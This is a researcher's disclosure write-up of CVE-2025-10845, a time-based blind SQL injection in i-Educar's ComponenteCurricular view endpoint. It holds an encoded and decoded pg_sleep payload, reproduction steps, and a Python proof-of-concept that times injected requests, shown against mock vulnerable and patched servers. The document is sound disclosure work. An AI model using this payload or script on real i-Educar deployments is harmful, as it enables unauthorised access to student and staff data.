CVE-2025-10845

How I Found a Time-Based Blind SQL Injection in i-Educar (With Real Delay and PoC).

🇧🇷 Read in Portuguese.

While digging into the open-source i-Educar project, I uncovered a critical time-based blind SQL injection vulnerability in the id parameter of the /module/ComponenteCurricular/view endpoint.
This flaw lets an attacker run arbitrary SQL against the backend database without any visible output (hence "blind"), putting data confidentiality, integrity, and availability at risk.
After validating the issue with a payload that caused a measurable delay in the server's response, I reported it responsibly, and it was assigned CVE-2025-10845.

CVE-2025-10845 is a SQL injection vulnerability in the /module/ComponenteCurricular/view endpoint of the i-Educar application.
The vulnerable parameter is id, which lacks proper input validation before it reaches the database query.
This makes it possible to inject arbitrary SQL, including a call to PostgreSQL's pg_sleep(), whose measurable delay in the response confirms the flaw even though no data or error is returned to the client.

Vulnerable Endpoint: /module/ComponenteCurricular/view

Affected Parameter: id

Payload Used (Encoded)

%27%20AND%206606=(SELECT%206606%20FROM%20PG_SLEEP(5))%20AND%20%27QDaZ%27=%27QDaZ

Payload Used (Decoded)

' AND 6606=(SELECT 6606 FROM PG_SLEEP(5)) AND 'QDaZ'='QDaZ

To reproduce the vulnerability:

➤ Open /intranet/educar_componente_curricular_lst.php and note the id of an existing record.

➤ On the vulnerable endpoint, append the payload directly after the id value (e.g. id=8' AND 6606=(SELECT 6606 FROM PG_SLEEP(5)) AND 'QDaZ'='QDaZ). The leading quote indicates that the id is embedded in a quoted SQL literal; the trailing 'QDaZ'='QDaZ re-balances the quotes so the statement still parses after the injection.

The server should take about 5 seconds longer to respond than a baseline request with the unmodified id, confirming that the injected pg_sleep() was executed. Re-running with a different value (e.g. PG_SLEEP(10)) and seeing the delay track it rules out ordinary server latency as the cause.
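To make the confirmation step above repeatable, here is an added example (written for this page; it is not code from the original report or from the i-Educar project). It builds and percent-encodes the payload, then measures a baseline and two injected requests with different pg_sleep() durations, accepting the finding only when the delay grows with the requested sleep. Because a live target cannot be reached offline, a constructed mock stands in for the endpoint: it concatenates the id into a quoted literal and honours any PG_SLEEP() it finds, exactly the behaviour the write-up describes. The table name in the mock, the transport signature, and the default 5/10-second sleeps are assumptions.

```python
"""Time-based blind SQLi confirmation, with a mock of the affected endpoint.

Added example, not i-Educar or original-report code. The mock server below
is constructed to mimic the described behaviour (id concatenated into a quoted
SQL literal, PG_SLEEP() honoured); its table name is hypothetical.
"""
import re
import statistics
import time
import urllib.parse
from typing import Callable, Tuple

# A transport: takes the decoded ?id= value and performs one request.
Send = Callable[[str], None]


def build_payload(seconds: float, marker: str = "QDaZ") -> str:
    """The write-up's payload, with the sleep duration made configurable."""
    return (f"' AND 6606=(SELECT 6606 FROM PG_SLEEP({seconds:g}))"
            f" AND '{marker}'='{marker}")


def encode_param(value: str) -> str:
    """Percent-encode like the write-up's encoded payload ('=' and parentheses left bare)."""
    return urllib.parse.quote(value, safe="=()")


def decode_param(value: str) -> str:
    return urllib.parse.unquote(value)


def measure(send: Send, value: str, samples: int) -> float:
    """Median wall-clock seconds over `samples` requests with the same id value."""
    times = []
    for _ in range(samples):
        start = time.perf_counter()
        send(value)
        times.append(time.perf_counter() - start)
    return statistics.median(times)


def confirm_time_based(send: Send, base_id: str,
                       sleeps: Tuple[float, float] = (5.0, 10.0),
                       samples: int = 3, tolerance: float = 0.5) -> bool:
    """Return True only if the response time tracks the requested PG_SLEEP().

    A baseline with the unmodified id is taken first, then two different sleep
    values are injected. Requiring the delay to grow with the sleep separates a
    real injection from a server that is merely slow or jittery.
    """
    short, long_ = sleeps
    baseline = measure(send, base_id, samples)
    t_short = measure(send, base_id + build_payload(short), 1)
    t_long = measure(send, base_id + build_payload(long_), 1)
    if t_short < baseline + short - tolerance:
        return False
    if t_long < baseline + long_ - tolerance:
        return False
    return (t_long - t_short) >= (long_ - short) - tolerance


_PG_SLEEP = re.compile(r"PG_SLEEP\(\s*([0-9.]+)\s*\)", re.IGNORECASE)


def make_vulnerable_server() -> Send:
    """Constructed stand-in for the affected endpoint (not i-Educar code)."""
    def send(id_value: str) -> None:
        # Concatenation into a quoted literal: the payload's leading quote closes
        # the literal and its trailing 'QDaZ'='QDaZ reopens one so the statement
        # still parses. Table name is hypothetical.
        query = f"SELECT * FROM componente_curricular WHERE id = '{id_value}'"
        hit = _PG_SLEEP.search(query)
        if hit:                       # the database would pause for this long
            time.sleep(float(hit.group(1)))
    return send


def make_patched_server() -> Send:
    """Stand-in for the fix: the id is validated and bound, never parsed as SQL."""
    def send(id_value: str) -> None:
        if not id_value.isdigit():
            return                    # rejected before any query is built
        # otherwise bound as a parameter: the SQL text is fixed, nothing to sleep on
    return send


if __name__ == "__main__":
    print(encode_param(build_payload(5)))
    # Short sleeps keep the demo quick; against a live target use the defaults.
    print("vulnerable:", confirm_time_based(make_vulnerable_server(), "8", (0.2, 0.4), tolerance=0.1))
    print("patched:   ", confirm_time_based(make_patched_server(), "8", (0.2, 0.4), tolerance=0.1))
```

Against a real deployment, `send` would be a function that issues the GET request with the encoded value in the id query parameter; the two-sleep check is the part worth keeping, since a single 5-second observation on a loaded server is easy to misread.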


Report

The full report, with the complete step-by-step instructions, is available here:

CVE-2025-10845 Report

This vulnerability can be exploited to:

  • Access sensitive data stored in the database;
  • Enumerate database schemas, tables, and columns;
  • Modify, delete, or insert arbitrary records;
  • Steal user credentials and personal information;
  • Perform a denial of service (DoS) attack by triggering long query delays;
  • In some cases, depending on the privileges of the database role the application uses, escalate to remote code execution (RCE).

The flaw was responsibly reported and is tracked as CVE-2025-10845.

SQL injection remains one of the most critical threats to web applications, especially in its blind, time-based form, where no error or data is returned to give the attack away. This discovery shows how a single unvalidated parameter can expose the entire database behind a platform.

If you're a developer or security analyst, be aware: even small, seemingly harmless endpoints can hide dangerous flaws.

Discovered with 💜 by Karina Gante.


Official Member of CVE-Hunters🏹
